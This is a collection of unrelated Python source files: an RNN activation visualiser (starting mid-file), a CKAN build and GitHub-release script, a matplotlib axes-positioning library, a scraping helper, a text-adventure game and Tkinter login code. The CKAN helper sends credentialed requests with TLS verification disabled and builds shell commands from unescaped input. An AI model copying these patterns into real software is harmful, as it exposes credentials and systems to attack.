table_row = y[i][j]
if '\n' in table_row:
wrapped_string += table_row.split('\n')[0] + '\\n' + table_row.split('\n')[1] + '\n'
line_width = 0
wrapped_string += ' ' * (max_width - line_width) * 0 + '\n'
else:
wrapped_string += ''.join(y[i][j])
line_width += len(y_n[i][j])
if line_width > max_width - 10:
line_width = 0
wrapped_string += ' '*(max_width - line_width)*0 + '\n'
table.table_data[2*i+1][1] = wrapped_string
max_activation = amax(neuron_activation_map[self.neurons_of_interest, :])
min_activation = amin(neuron_activation_map[self.neurons_of_interest, :])
margin = 8
color_range_width = max_width - len(table.table_data[0][1]) - (len(str(max_activation)) + len(str(min_activation)) + 2)
color_range = arange(min_activation, max_activation,
(max_activation - min_activation) / color_range_width)
color_range_str = ' '*margin + str(round(min_activation, 1)) + ' '
for i in range(color_range_width):
color_range_value = nan_to_num(color_range[i])/20.0
active_color = abs(int(color_range_value * 255)) if self.dark_theme else 255
inactive_color = 0 if self.dark_theme else 255 - abs(int(color_range_value * 255))
if color_range_value > 0:
red = active_color
green = inactive_color
blue = inactive_color
else:
red = inactive_color
green = inactive_color
blue = active_color
bg.set_style('activationColor', RgbBg(red, green, blue))
colored_indicator = bg.activationColor + ' ' + bg.rs
color_range_str += colored_indicator
color_range_str += ' ' + str(round(max_activation, 1))
table.table_data[0][1] += color_range_str
table.table_data[1:] = flip(table.table_data[1:], axis=0)
return table.table, neuron_activation_map, y_n[0]
def load_neuron_intervals(self):
with open('FeaturesOfInterest.txt', 'r') as f:
lines = f.readlines()
for line in lines:
if '#' not in line:
if 'Neurons to print:' in line:
line = line.replace('Neurons to print:', '')
intervals = ''.join(line.split()).split(',')
for interval in intervals:
if ':' in interval:
interval = interval.split(':')
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K - 1))
self.neurons_of_interest.extend(range(int(interval[0]), int(interval[-1]) + 1))
else:
interval = str(max(int(interval), 0))
interval = str(min(int(interval), self.K - 1))
self.neurons_of_interest.append(int(interval))
if 'Neurons to plot:' in line:
line = line.replace('Neurons to plot:', '')
intervals = ''.join(line.split()).split(',')
self.intervals_to_plot = []
self.interval_limits = []
self.interval_label_shift = '' # ' '
for interval in intervals:
if ':' in interval:
interval = interval.split(':')
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K-1))
self.neurons_of_interest_plot.extend(range(int(interval[0]), int(interval[-1]) + 1))
self.neurons_of_interest_plot_intervals.append(range(int(interval[0]), int(interval[-1]) + 1))
intermediate_range = [i for i in range(int(interval[0])+1, int(interval[-1])) if i%5 == 0]
intermediate_range.insert(0, int(interval[0]))
intermediate_range.append(int(interval[-1]))
intermediate_range_str = [str(i) for i in intermediate_range]
intermediate_range_str[-1] += self.interval_label_shift
self.intervals_to_plot.extend(intermediate_range_str)
self.interval_limits.extend(intermediate_range)
else:
interval = str(max(int(interval), 0))
interval = str(min(int(interval), self.K - 1))
self.neurons_of_interest_plot.append(int(interval))
self.neurons_of_interest_plot_intervals.append([int(interval)])
self.intervals_to_plot.append(interval)
self.interval_limits.append(int(interval))
self.interval_limits = array(self.interval_limits)
def back_prop(self, x, y, output, h):
tau = len(x)
# Initialize gradients
for grad, weight in zip(self.gradients, self.weights):
setattr(self, grad, zeros(getattr(self, weight).shape))
dLdO = []
for t in range(tau):
dLdO.append(output[t].T - y[t].T)
self.dLdV += dot(dLdO[t].T, h[t+1].T)
self.dLdC += dLdO[t].T
dLdAt = zeros((1, self.n_hidden_neurons))
for t in range(tau - 1, -1, -1):
dLdHt = dot(dLdO[t], self.V) + dot(dLdAt, self.W)
dLdAt = dot(dLdHt, diag(1 - h[t+1][:, 0]**2))
self.dLdW += dot(dLdAt.T, h[t].T)
self.dLdU += dot(dLdAt.T, x[t].T)
self.dLdB += dLdAt.T
if self.clip_gradients:
for grad in self.gradients:
setattr(self, grad, maximum(minimum(getattr(self, grad), self.gradient_clip_threshold), -self.gradient_clip_threshold))
def compute_loss(self, output, y):
# Cross entropy loss
tau = len(y)
loss = 0
accuracy = 0
if self.word_domain:
for t in range(tau):
loss += .5*sum((output[t] - y[t])**2)
accuracy += sum(output[t] - y[t])
else:
for t in range(tau):
loss -= sum(log(dot(y[t].T, output[t])))
p = output[t]
cp = cumsum(p)
rand = random.uniform()
diff = cp - rand
sample_index = [i for i in range(len(diff)) if diff[i] > 0]
if sample_index:
sample_index = sample_index[0]
else:
sample_index = len(diff) - 1
accuracy += y[t][sample_index]
loss = loss/max(float(tau), 1e-6)
accuracy = float(accuracy)/max(float(tau), 1e-6)
return loss, accuracy
def to_one_hot(self, x):
binarizer = sklearn.preprocessing.LabelBinarizer()
binarizer.fit(range(max(x.astype(int)) + 1))
X = array(binarizer.transform(x.astype(int))).T
return X
def seq_to_one_hot(self, x):
X = [array([self.char_to_ind.get(xt)]).T for xt in x]
return X
def seq_to_one_hot_matrix(self, x):
x_ind = self.seq_to_one_hot(x)
X = concatenate(x_ind, axis=1)
return X
def tanh(self, x):
return (exp(x) - exp(-x))/(exp(x) + exp(-x))
def softmax(self, s):
ex_p = exp(s)
p = ex_p/ex_p.sum()
return p
def randomize_hyper_parameters(n_configurations, attributes):
    attributes['n_epochs'] = 5
    attributes['weight_init'] = 'He'
for i in range(n_configurations):
attributes['n_hidden_neurons'] = 16*int(5*random.rand()+12)
attributes['eta'] = int(9*random.rand() + 1)*10**(-5 - int(2*random.rand()))
print('\n')
print('n: ' + str(attributes['n_hidden_neurons']))
print('Learning rate: ' + str(attributes['eta']))
print('\n')
rnn = VisualizeRNN(attributes)
rnn.run_vanilla_rnn()
def main():
attributes = {
'text_file': '../Corpus/ted_en.zip', # Corpus file for training
'dark_theme': True, # True for dark theme, else light (then terminal text/background color needs to be adjusted)
'train_model': False, # True to train model, otherwise inference process is applied for text generation
'model_directory': 'Vanilla RNN Saved Models/val_loss2.072-val_acc0.445-loss1.335-epoch6-iteration674039-neurons224-eta-9.00e-5/',
'word_domain': False, # True for words, False for characters
'save_sentences': False, # Save sentences and vocabulary
'load_sentences': True, # Load sentences and vocabulary
'validation_proportion': .02, # The proportion of data set used for validation
'corpus_proportion': 1.0, # The proportion of the corpus used for training and validation
'ada_grad_sgd': True, # Stochastic gradient decent, True for ada_grad, False for regular SGD
'clip_gradients': True, # True to avoid exploding gradients
'gradient_clip_threshold': 5, # Threshold for clipping gradients
'weight_init': 'Load', # 'He', 'Load' or 'Random'
'eta': 9.00e-5, # Learning rate
'n_hidden_neurons': 224, # Number of hidden neurons
'n_epochs': 10, # Total number of epochs, each corresponds to (n book characters)/(seq_length) seq iterations
'seq_length': 25, # Sequence length of each sequence iteration
'length_synthesized_text': 300, # Sequence length of each print of text evolution
'length_synthesized_text_best': 1000, # Sequence length of final best sequence, requires save_parameters
'rms_prop': True, # Implementation of rms_prop to ada_grad_sgd
'gamma': 0.9, # Weight factor of rms_prop
'save_parameters': False # Save best weights with corresponding arrays iterations and smooth loss
}
# randomize_hyper_parameters(500, attributes)
rnn_vis = VisualizeRNN(attributes)
rnn_vis.run_vanilla_rnn()
if __name__ == '__main__':
random.seed(2)
main()
plt.show()
``` |
{
"source": "johndalton/CKAN",
"score": 2
} |
#### File: CKAN/bin/ckan-build.py
```python
from ckan_github_utils import *
import os, sys
import argparse
def main():
parser = argparse.ArgumentParser(description='Builds CKAN from a list of commit hashes')
parser.add_argument('--ckan-core-hash', dest='core_hash', action='store', help='The commit hash for CKAN-core', required=False)
parser.add_argument('--ckan-gui-hash', dest='gui_hash', action='store', help='The commit hash for CKAN-GUI', required=False)
parser.add_argument('--ckan-cmdline-hash', dest='cmdline_hash', action='store', help='The commit hash for CKAN-cmdline', required=False)
parser.add_argument('--ckan-release-version', dest='release_version', action='store', help='The version with which to stamp ckan.exe', required=False)
args = parser.parse_args()
build_ckan(args.core_hash, args.gui_hash, args.cmdline_hash, args.release_version)
if __name__ == "__main__":
main()
```
#### File: CKAN/bin/ckan_github_utils.py
```python
GITHUB_API = 'https://api.github.com'
CKAN_CORE_VERSION_STRING = 'private readonly static string BUILD_VERSION = null;'
CKAN_CORE_VERSION_STRING_TARGET = 'private readonly static string BUILD_VERSION = "%s";'
# ---* DO NOT EDIT BELOW THIS LINE *---
import os, sys
import urllib
import requests
from urlparse import urljoin
import datetime
import base64
import json
import shutil
def run_git_clone(repo, commit_hash):
if os.path.isdir(repo):
shutil.rmtree(repo)
cwd = os.getcwd()
if os.system('git clone https://github.com/KSP-CKAN/%s.git' % repo) != 0:
sys.exit(1)
os.chdir(os.path.join(cwd, repo))
if commit_hash != 'master':
if os.system('git checkout -f %s' % commit_hash) != 0:
sys.exit(1)
os.chdir(cwd)
def build_repo(repo):
cwd = os.getcwd()
os.chdir(os.path.join(cwd, repo))
if os.system('sh build.sh') != 0:
sys.exit(1)
os.chdir(cwd)
def stamp_ckan_version(version):
cwd = os.getcwd()
os.chdir(os.path.join(cwd, 'CKAN-core'))
meta_contents = None
with open('Meta.cs', 'r') as meta_file:
meta_contents = meta_file.read()
if meta_contents == None:
print 'Error reading Meta.cs'
sys.exit(1)
meta_contents = meta_contents.replace(CKAN_CORE_VERSION_STRING, CKAN_CORE_VERSION_STRING_TARGET % version)
with open("Meta.cs", "w") as meta_file:
meta_file.write(meta_contents)
os.chdir(cwd)
def build_ckan(core_hash, gui_hash, cmdline_hash, release_version):
if core_hash == None:
core_hash = 'master'
if gui_hash == None:
gui_hash = 'master'
if cmdline_hash == None:
cmdline_hash = 'master'
print 'Building CKAN from the following commit hashes:'
print 'CKAN-core: %s' % core_hash
print 'CKAN-GUI: %s' % gui_hash
print 'CKAN-cmdline: %s' % cmdline_hash
run_git_clone('CKAN-core', core_hash)
run_git_clone('CKAN-GUI', gui_hash)
run_git_clone('CKAN-cmdline', cmdline_hash)
if release_version != None:
stamp_ckan_version(release_version)
build_repo('CKAN-core')
build_repo('CKAN-GUI')
build_repo('CKAN-cmdline')
print 'Done!'
def make_github_post_request(url_part, username, password, payload):
url = urljoin(GITHUB_API, url_part)
print '::make_github_post_request - %s' % url
return requests.post(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_get_request(url_path, username, password, payload):
url = urljoin(GITHUB_API, url_path)
print '::make_github_get_request - %s' % url
return requests.get(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_put_request(url_path, username, password, payload):
url = urljoin(GITHUB_API, url_path)
print '::make_github_put_request - %s' % url
return requests.put(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_post_request_raw(url_part, username, password, payload, content_type):
url = urljoin(GITHUB_API, url_part)
print '::make_github_post_request_raw - %s' % url
headers = { 'Content-Type': content_type }
return requests.post(url, auth = (username, password), data = payload, verify=False, headers=headers)
def make_github_release(username, password, repo, tag_name, name, body, draft, prerelease):
payload = {}
payload['tag_name'] = tag_name
payload['name'] = name
payload['body'] = body
payload['draft'] = draft
payload['prerelease'] = prerelease
return make_github_post_request('/repos/%s/releases' % repo, username, password, payload)
def make_github_release_artifact(username, password, upload_url, filepath, content_type = 'application/zip'):
filename = os.path.basename(filepath)
query = { 'name': filename }
url = '%s?%s' % (upload_url[:-7], urllib.urlencode(query))
payload = file(filepath, 'r').read()
return make_github_post_request_raw(url, username, password, payload, content_type)
def get_github_file(username, password, repo, path):
return make_github_get_request('/repos/%s/contents/%s' % (repo, path), username, password, {})
def push_github_file_sha(username, password, repo, path, sha, content, branch='master'):
payload = {}
payload['path'] = path
payload['message'] = 'Updating build-tag'
payload['content'] = base64.b64encode(content)
payload['sha'] = sha
payload['branch'] = branch
return make_github_put_request('/repos/%s/contents/%s' % (repo, path), username, password, payload)
def push_github_file(username, password, repo, path, content, branch='master'):
response = get_github_file(username, password, repo, path)
if response.status_code >= 400:
print 'There was an issue fetching "%s"! Status: %s - %s' % (path, str(response.status_code), response.text)
sys.exit(1)
response_json = json.loads(response.text)
return push_github_file_sha(username, password, repo, response_json['path'], response_json['sha'], content)
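# Usage sketch (untested; the credentials, repository and file path below are placeholders):
# push_github_file('github-user', 'api-token', 'KSP-CKAN/CKAN-meta', 'build-tag', 'v1.2.3')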
``` |
{
"source": "johndamen/axpositioning",
"score": 3
} |
#### File: axpositioning/axpositioning/axpositioning.py
```python
from matplotlib.axes import Axes
from matplotlib.transforms import Bbox
class PositioningAxes(Axes):
"""
Class for editing axes position
"""
@classmethod
def from_axes(cls, fig, a, **kwargs):
return cls(fig, a.get_position().bounds, **kwargs)
def __init__(self, fig, bounds, lock_aspect=False, anchor='C', **kwargs):
super(PositioningAxes, self).__init__(fig, bounds, **kwargs)
self._locked_aspect = lock_aspect
self.set_anchor(anchor)
def set_anchor(self, a):
"""ensure tuple of anchor position and set using Axes.set_anchor"""
if a in Bbox.coefs:
a = Bbox.coefs[a]
self._anchor = a
def split(self, ratio=0.5, spacing=0.1, wsplit=True):
anchor = self.get_anchor()
self.set_anchor('SW')
try:
if wsplit:
pos, size = self.x, self.w
else:
pos, size = self.y, self.h
if spacing >= size:
raise ValueError('spacing too large, cannot split axes')
size1 = (size - spacing) * ratio
size2 = (size - spacing) * (1 - ratio)
pos2 = pos + size1 + spacing
if wsplit:
newbounds = (pos2, self.y, size2, self.h)
self.w = size1
else:
newbounds = (self.x, pos2, self.w, size2)
self.h = size1
finally:
self.set_anchor(anchor)
return newbounds
@property
def bounds(self):
"""returns (xll, yll, w, h)"""
return self._position.bounds
@bounds.setter
def bounds(self, v):
"""set new bounds"""
self.set_position(v)
@property
def absolute_bounds(self):
"""screen coordinates of bounds"""
x, y, w, h = self.bounds
return self.rel2abs(x, 'x'), \
self.rel2abs(y, 'y'), \
self.rel2abs(w, 'w'), \
self.rel2abs(h, 'h')
def x2xll(self, x):
"""convert x position to xll based on anchor"""
return x - self.w * self.get_anchor()[0]
def xll2x(self, xll):
"""convert xll to x position based on anchor"""
return xll + self.w * self.get_anchor()[0]
def y2yll(self, y):
"""convert y position to yll based on anchor"""
return y - self.h * self.get_anchor()[1]
def yll2y(self, yll):
"""convert yll to y position based on anchor"""
return yll + self.h * self.get_anchor()[1]
@property
def x(self):
"""x position as xll corrected for the anchor"""
return self.xll2x(self.bounds[0])
@x.setter
def x(self, x):
"""reset the bounds with a new x value"""
_, yll, w, h = self.bounds
xll = self.x2xll(x)
self.bounds = xll, yll, w, h
@property
def y(self):
return self.yll2y(self.bounds[1])
@y.setter
def y(self, y):
"""reset the bounds with a new y value"""
xll, _, w, h = self.bounds
yll = self.y2yll(y)
self.bounds = xll, yll, w, h
@property
def w(self):
"""width of the axes"""
return self.bounds[2]
@w.setter
def w(self, w):
"""
reset the bounds with a new width value
the xll is corrected based on the anchor
if the aspect ratio is locked, the height and yll are also adjusted
"""
xll, yll, w0, h = self.bounds
# adjust horizontal position based on anchor
xll += self.get_anchor()[0] * (w0 - w)
# adjust height if aspect is locked
if self._locked_aspect:
h0, h = h, w / self.axaspect
# adjust vertical position based on anchor
yll += self.get_anchor()[1] * (h0 - h)
self.bounds = xll, yll, w, h
@property
def h(self):
"""height of the axes"""
return self.bounds[3]
@h.setter
def h(self, h):
"""
reset the bounds with a new height value
the yll is corrected based on the anchor
if the aspect ratio is locked, the width and xll are also adjusted
"""
xll, yll, w, h0 = self.bounds
# adjust vertical position based on anchor
yll += self.get_anchor()[1] * (h0 - h)
# adjust width if aspect is locked
if self._locked_aspect:
w0, w = w, h * self.axaspect
# adjust horizontal position based on anchor
xll += self.get_anchor()[0] * (w0 - w)
self.bounds = xll, yll, w, h
@property
def figaspect(self):
"""aspect ratio of the figure"""
fw, fh = self.figure.get_size_inches()
return fw/fh
@property
def axaspect(self):
"""aspect ratio of the axes"""
return self.figaspect / self.aspect
@property
def aspect(self):
"""real aspect ratio of figure and axes together"""
_, _, aw, ah = self.bounds
return self.figaspect * (aw/ah)
@aspect.setter
def aspect(self, v):
self.set_aspect_ratio(v)
def lock_aspect(self, b):
"""keep the aspect fixed"""
self._locked_aspect = b
def set_aspect_ratio(self, A, fix_height=False):
"""set the aspect ratio by adjusting width or height"""
axaspect = A / self.figaspect
if fix_height:
self.w = self.h * axaspect
else:
self.h = self.w / axaspect
def __repr__(self):
return '<{} ({})>'.format(
self.__class__.__qualname__,
', '.join('{:.2f}'.format(b) for b in self.bounds))
@classmethod
def from_position(cls, fig, x, y, w, h, anchor):
"""
accounts for anchor when setting the bounds from the position
"""
# TODO: incorporate in __init__ using apply_anchor=True
o = cls(fig, [x, y, w, h], anchor=anchor)
o.x, o.y, o.w, o.h = x, y, w, h
return o
def abs2rel(self, val, attr):
w, h = self.figure.get_size_inches()
dpi = self.figure.get_dpi()
if attr in ('w', 'x'):
return val / (w*dpi)
elif attr in ('h', 'y'):
return val / (h*dpi)
else:
return val
def rel2abs(self, val, attr):
w, h = self.figure.get_size_inches()
dpi = self.figure.get_dpi()
if attr in ('w', 'x'):
return val * w * dpi
elif attr in ('h', 'y'):
return val * h * dpi
else:
return val
```
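A short usage sketch of `PositioningAxes` (the import path and numbers are illustrative; the class only does position bookkeeping, so nothing is drawn here):
```python
import matplotlib.pyplot as plt
from axpositioning import PositioningAxes  # assumed public import path

fig = plt.figure(figsize=(6, 4))
ax = PositioningAxes(fig, [0.1, 0.3, 0.3, 0.3], anchor='C')

ax.w = 0.4        # width changes around the centre anchor, so xll shifts accordingly
ax.aspect = 1.0   # adjust height so the axes comes out square on screen
print(ax.bounds)
```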
#### File: axpositioning/gui/__init__.py
```python
from PyQt5 import QtWidgets, QtCore
import sys
import subprocess
import pickle
from matplotlib.figure import Figure
from .main import AxPositioningEditor
__all__ = ['position_axes_gui', 'position_axes_gui_subprocess', 'adjust_figure_layout']
def position_axes_gui(figsize, bounds, **kwargs):
"""
open gui to set axes positions
:param figsize: tuple of width and height
:param bounds: list of axes bounds
:param kwargs: ...
:return: list of new bounds
"""
if isinstance(figsize, Figure):
figsize = figsize.get_size_inches()
app = QtWidgets.QApplication([])
w = AxPositioningEditor(figsize, bounds, **kwargs)
w.show()
try:
app.exec()
return w.as_dict()
finally:
w.deleteLater()
def position_axes_gui_subprocess(figsize, bounds):
"""
open gui in new subprocess and retrieve the results over stdout
:param figsize: figure size
:param bounds: list of axes bounds
:return: new bounds
"""
cmd = [sys.executable, '-m', __name__, '--stream-bounds', '-W', str(figsize[0]), '-H', str(figsize[1])]
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
pickler = pickle.Pickler(p.stdin)
pickler.dump(bounds)
p.stdin.close()
p.wait()
out = p.stdout.read()
newbounds = []
for line in out.decode('utf-8').splitlines():
if not line:
continue
if line.startswith('FIG:'):
figsize = tuple(map(float, line[4:].strip().split(',')))
else:
newbounds.append([float(v) for v in line.strip().split(',')])
return figsize, newbounds
def adjust_figure_layout(fig, **kwargs):
axes = fig.get_axes()
bounds = [a.get_position().bounds for a in axes]
figsize, newbounds = position_axes_gui_subprocess(fig.get_size_inches(), bounds)
fig.set_size_inches(*figsize)
for a in axes[len(newbounds):]:
fig.delaxes(a)
assert len(fig.get_axes()) <= len(newbounds)
for i, bnd in enumerate(newbounds):
try:
ax = axes[i]
except IndexError:
ax = fig.add_axes(bnd)
else:
ax.set_position(list(bnd))
``` |
{
"source": "johndao1005/Hacktoberfest-2",
"score": 3
} |
#### File: Beginner/03. Python/webscraping.py
```python
import requests
from bs4 import BeautifulSoup
def get_bs4_page(url, headers=True):
    # Fetch a URL and return it parsed with BeautifulSoup (lxml parser).
    # A desktop browser User-Agent is sent by default; pass headers=False to omit it.
    if headers:
        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
                   'AppleWebKit/537.36 (KHTML, like Gecko) '
                   'Chrome/39.0.2171.95 Safari/537.36'}
    else:
        headers = None
    r = requests.get(url, headers=headers)
    page = BeautifulSoup(r.content, 'lxml')
    return page
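# Illustrative usage (not in the original snippet; the URL is a placeholder):
#     page = get_bs4_page('https://example.com')
#     print(page.title.text if page.title else 'no title')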
``` |
{
"source": "johndao1005/pythonPlayground",
"score": 4
} |
#### File: johndao1005/pythonPlayground/pythonGui.py
```python
import PySimpleGUI as sg
def make_window(content,choice1,choice2):
layout =[[sg.Text(content)],[sg.Button(choice1),sg.Button(choice2)]]
return sg.Window('Light house', layout, finalize=True)
window0,window1,window2= sg.Window("Light house",[[sg.Text("Welcome to my game")],[sg.Button("Start"),sg.Button("Exit")]],finalize=True),None,None
def lightHouseGUI():
    # window1/window2 are created lazily as the story progresses; initialise them
    # so the close-handling checks below don't raise UnboundLocalError first.
    window1 = window2 = None
    while True:
window, event, values = sg.read_all_windows()
if event == sg.WINDOW_CLOSED or event == 'Quit' or event == 'Exit'or event=="Restart":
window.close()
if window == window2: # if closing win 2, mark as closed
window2 = None
elif window == window0: # if closing win 1, exit program
break
if event == "Start" or event == "Restart":
window1= make_window("Welcome To the lighthouse,\n You just wake up to find yourself in a cold room with nothing\nbut darkness around, outside only the sound of the ocean and cold gale while you \nlying on the, cold dirty floor. Suddenly loud noise can be hear outside. Looking out the window,\nyou saw a dark shadow with claw climb up the light house.\nWhat do you want to do?",'Jump out the window','Try to escape')
elif event == "Jump out the window":
window1.close()
window2 = make_window("You jump out the window and try to grab the Monster to die with you. \nWhen both of you are falling, you remove the mask to see yourself with a happy smile. The monster whisper in your ear: \n'Wear the mask if you want something new'\nDo you want to wear the mask?","Wear the mask","Just die")
elif event == "Try to escape":
window1.close()
window2 = make_window("Looking at the door tightly locked door. What would you do?","Look for key","Ram the door")
elif event == "Ram the door":
window2.close()
window1 = make_window("You dislocate your shouder and try to look for key instead. but the monster catch up\nSo you die. Too bad.","Restart","Quit")
elif event == "Look for key":
window2.close()
window1 =make_window("Lucky the key is in your pocket somehow. You unlock the door and want to go down the stair but the stair is broken. What do you do?", \
"Find a Rope","Jump down")
elif event == "Find a Rope":
window1.close()
window2 = make_window("Running back you facing the monster. there is a sword nearby\nWould you take the sword and fight for your last chance?","Fight","Beg for Mercy")
elif event == "Fight":
window2.close()
window1 =make_window("Taking the sword and fight for your life. Surpisingly, you seem to know\nThe monster movement like yourself and you win after stabing it heart. Upon\ncoming closer and remove the mask, you saw your face smiling in relieve. \nLooking at the mask, look like it is pulling you over. What would you do?", "Wear the mask","Stab yourself")
elif event == "Beg for Mercy":
window2.close()
window1 =make_window("Too scared from looking at the monster. You begged for your life. Seem like u didnt watch much\nscary movie, why begging then you will die anyway num num. Dont need to say much, You die", \
"Restart","Quit")
elif event =="Stab yourself":
window1.close()
window2 =make_window(".Waking up in your room feeling unreal but relieved. Suddenly, you Feel tired and want to go back to sleep.\nWould you sleep again?\n*Note: This is the closest thing of winning this game. Be proud", \
"Restart","Quit")
elif event == "Jump down":
window1.close()
window2 = make_window("you over jump and hurt your leg. The Monster catch up quickly and you die. lol ",\
"Restart","Quit")
elif event == "Just die":
window2.close()
window1 =make_window("You die, pretty sad, want to start again?", "Restart","Quit")
elif event == "Wear the mask":
window2.close()
window1=make_window("The Monster is inside you and you are the monster, You will keep hunting yourself till you die","Restart","Quit")
if __name__== "__main__":
lightHouseGUI()
# Trying to stay in the same window
# layout = [[sg.Text("Welcome To the lighthouse,\n You just wake up to find yourself in a cold room with nothing\n\
# but darkness around, outside only the sound of the ocean and cold gale while you \n\
# lying on the, cold dirty floor. Suddenly loud noise can be hear outside. Looking out the window,\n\
# you saw a dark shadow with claw climb up the light house.\n\
# What do you want to do?",key='-TEXT-') ],\
# # [sg.Button('Jump out the window',visible=False,key='-14-'), sg.Button('Try to escape',visible=False,key='-16-')],\
# [sg.Button('Take the mask',visible=False,key='-13-'), sg.Button('Just die, lol',visible=False,key='-14-')],\
# [sg.Button('Restart',visible=False,key='-11-'), sg.Button('Quit',visible=False,key='-12-')],\
# [sg.Button('Take the mask',visible=False,key='-9-'), sg.Button('Smash it',visible=False,key='-10-')],\
# [sg.Button('Fight back',visible=False,key='-7-'), sg.Button('Beg for your life',visible=False,key='-8-')],\
# [sg.Button('Go back to find a rope',visible=False,key='-5-'), sg.Button('Try to jump',visible=False,key='-6-')],\
# [sg.Button('Look for key',visible=False,key='-3-'), sg.Button('Ram the door',visible=False,key='-4-')],\
# [sg.Button('Jump out the window',key='-1-'), sg.Button('Try to escape',key='-2-')]]
# # Create the window
# window = sg.Window('Light house', layout)
# # Display and interact with the Window using an Event Loop
# def choice(content,option1,option2):
# window[f'-{option1}-'].update(visible=False)
# window[f'-{option1+1}-'].update(visible=False)
# window['-TEXT-'].update(content)
# window[f'-{option2}-'].update(visible=True)
# window[f'-{option2+1}-'].update(visible=True)
# # See if user wants to quit or window was closed
# # Output a message to the window
# while True:
# event, values = window.read()
# if event == sg.WINDOW_CLOSED or event == 'Quit':
# break
# if event =='-1-':
# choice("You jump out the window and try to grab the Monster to die with you. When both of you are falling, you remove the mask to see yourself with a happy smile. The monster whisper in your ear:\n'Wear the mask if you want something new':\n "\
# ,1,13)
# if event =='-2-':
# choice("Looking at the door tightly locked door. What would you do?",1,3)
# if event =='-3-':
# choice("Lucky the key is in your pocket somehow. You unlock the door and want to go down the stair but the stair is broken. What do you do?",3,5)
# if event =='-4-':
# choice()
# if event =='-5-':
# choice()
# if event =='-6-':
# choice()
# if event =='-7-':
# choice()
# if event =='-8-':
# choice()
# if event =='-9-':
# choice()
# if event =='-10-':
# choice()
# if event =='-11-':
# event, values = window.read()
# break
# # Finish up by removing from the screen
# window.close()
``` |
{
"source": "johndao1005/SDV602-Milestone2-QuangThanhDao",
"score": 4
} |
#### File: controller/login/auth.py
```python
from tkinter.messagebox import showinfo, showerror
def authentication(parent, name, pw=""):
    """Function to check if the username and password are correct, then destroy the login window
    and open the main menu to allow users to interact with the application
    Args:
        name (string): username from user input
        pw (string): password from user input
    """
    from view.dataView import dataView
showinfo("Welcome User", "Login successfully, Happy browsing!!")
parent.destroy()
dataView()
```
#### File: controller/login/register.py
```python
def makeUser(self,name,pw,pw2,email):
"""Checking input is valid and not already exist in the current database before creating new user instance
Args:
name (string): username taken from user input, need to be more than 2 characters and less than 20 characters
pw (string): password taken from user input, need to be more than 8 character and less than 20 characters
pw2 (string): confirm password, need to be identical with password input
email (string): email from user, need to have @ and valid email name
"""
self.destroy()
pass
```
#### File: model/data/data_scan.py
```python
import csv
from os import path
import pandas as pd
from typing import Dict
class DataManager():
"""Data manager class which handle the raw data at the lowest level which directly interact with csv
"""
def readFile(self, filePath):
"""Read csv file in dictionary format with dict reader
Args:
filePath (string): the path to the file
Returns:
            list: the row data read with the dictionary reader
"""
with open(filePath, 'r', newline="") as data:
dataset = csv.DictReader(data)
output = []
for row in dataset:
output.append(row)
return output
    def append(self, newFile, currentFile):
        """Append the new file's data to the bottom of the current file with the dictionary writer
        Args:
            newFile (string): the path of the file to merge in
            currentFile (string): the path of the current file
        """
header = ["X", "Y", "FID", "id", "modified", "language", "rights", "rightsHolder", "bibliographicCitation", "institutionCode", "collectionCode", "basisOfRecord", "catalogNumber", "occurrenceRemarks", "individualID", "individualCount", "sex", "occurrenceStatus", "eventDate", "year", "waterBody",
"decimalLatitude", "decimalLongitude", "geodeticDatum", "coordinateUncertaintyInMeters", "footprintWKT", "georeferenceRemarks", "scientificNameID", "scientificName", "kingdom", "phylum", "class", "order_", "family", "genus", "subgenus", "specificEpithet", "infraspecificEpithet", "scientificNameAuthorship"]
with open(currentFile, 'a', newline="") as targetData:
writer = csv.DictWriter(targetData, header,extrasaction='ignore')
for row in self.readFile(newFile):
writer.writerow(row)
def readLocation(self, filePath):
"""Reading the current csv file in pandas to allow plotting the data with geopandas with the map
Args:
filePath (string): the path to the csv file
Returns:
pandas: pandas format longtitude and latitude
"""
locationData = pd.read_csv(filePath,
usecols=["decimalLatitude",
"decimalLongitude"],
)
return locationData
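# Illustrative usage sketch (not part of the original file; the csv paths are placeholders):
#     dm = DataManager()
#     rows = dm.readFile('data/current.csv')          # list of dict rows
#     dm.append('data/new.csv', 'data/current.csv')   # append rows, ignoring unknown columns
#     coords = dm.readLocation('data/current.csv')    # DataFrame of latitude/longitude columns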
``` |
{
"source": "johndao1005/SDV602-Milestone3-QuangThanhDao",
"score": 4
} |
#### File: controller/login/auth.py
```python
from tkinter.messagebox import showinfo, showerror
from view.dataView import DataView
def authentication(login, email, pw):
"""Function to check the if username and password is correct then destroy the login window
and open the main menu to allow users interact with the application
Args:
login (class): instance of login window
name (string): email from user input
pw (string): password from user input
"""
if email.strip() == "" or pw.strip() == "":
showerror("Empty input", "Please type your email and password to login")
else:
checkUser = login.userControl.authentication(email, pw)
if isinstance(checkUser, str):
showerror("Authentication failed", checkUser)
else:
showinfo("Login success", "You seem legal, happy browsing")
login.destroy()
DataView(checkUser['name']).mainloop()
```
#### File: controller/login/register.py
```python
from tkinter.messagebox import showinfo, showerror
import re
regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
def register(login, name, pw, pw2, email):
"""Checking input is valid and not already exist in the current database before creating new user instance
Args:
login (class): an instance of login window
name (string): username taken from user input, need to be more than 2 characters and less than 20 characters
pw (string): password taken from user input, need to be more than 8 character and less than 20 characters
pw2 (string): confirm password, need to be identical with password input
email (string): email from user, need to have @ and valid email name
"""
error = ""
pw = pw.strip()
pw2 = pw2.strip()
name = name.strip()
email = email.strip()
# validate the information
if len(pw) < 8:
error += "\nThe password needs to be at least 8 characters"
if pw2 != pw:
error += "\nThe confirm password must be the same as <PASSWORD>"
if not re.fullmatch(regex, email):
error += "\nEnter a valid email address"
elif login.userControl.check('email', email) != 0:
error += "\nThe email is already in use"
if login.userControl.check('name', name) != 0:
error += "\nThe username is already in use"
# check if there is no error then create users
if error != "":
showerror("Incorrect input(s)",
f"Please correct the following errors:{error}")
else:
login.userControl.register(name, pw, email)
showinfo("Registered success", "User is registered successfully")
login.closeSignup()
```
